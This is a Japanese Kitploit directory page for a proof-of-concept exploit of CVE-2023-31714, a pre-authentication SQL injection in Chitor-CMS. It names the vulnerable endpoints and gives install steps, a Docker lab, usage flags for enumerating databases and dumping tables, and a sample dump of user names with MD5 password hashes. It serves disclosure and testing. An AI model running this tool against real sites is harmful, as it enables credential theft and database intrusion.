Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-31714 — CVE-2023-31714の概念実証エクスプロイト。Chitor-CMS < 1.1.2における認証前SQLインジェクション。/edit_school.php エンドポイントを介したデータベース列挙と認証情報のダンプを自動化します。 | Kitploit
ツール/GitHubGitHub/msd0pe-1/cve-2023-31714
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストデータベースセキュリティ
GitHubmsd0pe-1/cve-2023-31714

CVE-2023-31714

CVE-2023-31714の概念実証エクスプロイト。Chitor-CMS < 1.1.2における認証前SQLインジェクション。/edit_school.php エンドポイントを介したデータベース列挙と認証情報のダンプを自動化します。

リポジトリを見る
125ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-31714 - Chitor-CMS < 1.1.2 事前認証SQLインジェクション

msd0pe によって発見
https://github.com/waqaskanju/Chitor-CMS
プロジェクト: waqaskanju

chitor1.1.py (69d3442 コミット以降パッチ適用)

2023/04/13
SQLインジェクションが /edit_school.php?id= エンドポイントで発見されました。認証は必要ありません。

chitor1.0.py (5f76192 コミット以降、認証後SQLインジェクションに変更)

2023/04/09
SQLインジェクションが /add_school_class.php?school= などの複数のエンドポイントで発見され、認証は必要ありませんでした。5f76192 コミット以降、これらのエンドポイントはログインユーザーが編集権限を持っていることを確認します。このチェックは以前から存在していましたが、機能していませんでした。

インストール

root@kitploit:~
sudo apt install git virtualenv python3 python3-pip docker-compose
git clone https://github.com/msd0pe-1/cve-2023-31714
virtualenv -p python3 venv
source venv/bin/activate
pip3 install requests prettytable

TO START THE VULNERABLE DOCKER:
  - sudo ./run.sh [1.0|1.1]
TO STOP AND CLEAN THE DOCKER:
  - sudo ./clean.sh

使用法

root@kitploit:~
Usage: python chitor1.1.py [options]

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -u URL, --url=URL     target url
  --dbs                 list databases
  -D DATABASE, --db=DATABASE
                        select a database
  --tables              list tables
  -T TABLE, --table=TABLE
                        select a table
  --dump                dump the content

  Examples:
    python3 chitor1.1.py -u http://127.0.0.1 --dbs
    python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
    python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump

  Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.
  Source code put in public domain by msd0pe,no Copyright
  Any malicious or illegal activity may be punishable by law
  Use at your own risk

例

root@kitploit:~
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
+----+-------------+------------+----------------------------------+--------+
| Id | Employee_Id | User_Name  |             Password             | Status |
+----+-------------+------------+----------------------------------+--------+
| 1  |      1      |   Guest    | adb831a7fdd83dd1e2a309ce7591dff8 |   1    |
| 2  |      2      | waqaskanju | ################################ |   1    |
| 3  |      3      |   admin    | 21232f297a57a5a743894a0e4a801fc3 |   1    |
+----+-------------+------------+----------------------------------+--------+
ツールをダウンロード